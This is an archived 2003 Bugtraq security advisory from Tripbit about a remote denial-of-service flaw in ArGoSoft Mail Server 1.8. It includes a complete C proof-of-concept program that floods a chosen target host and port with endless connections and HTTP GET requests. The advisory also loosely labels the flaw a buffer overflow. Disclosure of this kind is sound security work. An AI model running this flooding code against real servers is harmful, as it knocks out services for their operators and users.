lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3EE7674C.7060607@tripbit.org>
Date: Wed, 11 Jun 2003 19:30:52 +0200
From: "Rushjo@...pbit.org" <rushjo@...pbit.org>
To: bugtraq@...urity-focus.com
Subject: Denial of Service Attack against ArGoSoft Mail Server Version 1.8


TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version 
1.8 (1.8.3.5)
contributed by: rushjo
====================================================================================== 

Tripbit Security Advisory

TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version 
1.8 (1.8.3.5)
====================================================================================== 



PROGRAM: ArGoSoft Mail Server  
HOMEPAGE: http://www.argosoft.com
VULNERABLE VERSIONS: 1.8 (1.8.3.5)
NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof   
RISK: Medium
IMPACT: Denial of Service Attack  
RELEASE DATE: 2003-06


====================================================================================== 

TABLE OF CONTENTS
====================================================================================== 



1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK


1. DESCRIPTION
====================================================================================== 



"ArGoSoft Mail Server is fully functional SMTP/POP3/Finger server for 
Windows
95/98/Me/2k/XP, which will let you turn your computer into the email 
system.
It's very compact, takes only about 1Mb of disk space, does not have any 
specific
memory requirements, and what is the most important - it's very easy to use.

Currently we have three different versions of server: freeware, Plus and 
Pro."
(This description is taken from the website of ArGo Software Design)
 

2. DETAILS
====================================================================================== 



ยค Remote DoS :


A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote
attackers to crash the server by executing too much "get Request.


The command can be issued to the Mail server by everyone. The attacker 
need no
authentification.



3. EXPLOIT
====================================================================================== 



This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.


NOTE: This is only for INFORMATION purposes and not for any
      destructive acts!


/**********************************************************************************
*
*     Denial of Service Attack against ArGoSoft Mail Server Version 1.8 
(1.8.3.5)
*    
*    Tripbit Security Development
*    ---------------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@...pbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*    [-] IRC: irc.euirc.net 6667 #tripbit
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;
    char sendstring[1024];
    
    strcpy(sendstring, "GET  /index.html HTTP/1.0\n\n");
    
    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n", argv[0]);
        exit(0);
    }
    
    port = atoi(argv[2]);
    
    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }
    
    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);
    
    printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
    
    for(;;)
    {
        if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
        {
            printf("socket() failed!\n");
            exit(0);
        }

        if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
        {
            printf("connect() failed!\n");
            close(sockfd);
        }
        
        if (write(sockfd, sendstring, strlen(sendstring)) < 0)
        {
            break;
        }
        
        close(sockfd);
    }

    printf("Attack done!...\n");
}



This error will produce an "crash" of the ArGoSoft Mail Server.



4. SOLUTIONS
================================================================================ 



No solution for the moment.



5. VENDOR STATUS
================================================================================ 



The vendor has reportedly been notified but no answer of to this report.



6. CREDITS
================================================================================ 



Discovered by posidron



7. DISLAIMER
======================================================================


The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.



8. REFERENCES
======================================================================


- Original Version:
http://www.tripbit.org


9. FEEDBACK
======================================================================


Please send suggestions, updates, and comments to:


Tripbit Security Advisory
http://www.tripbit.org
rushjo@...pbit.org
posidron@...pbit.org





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ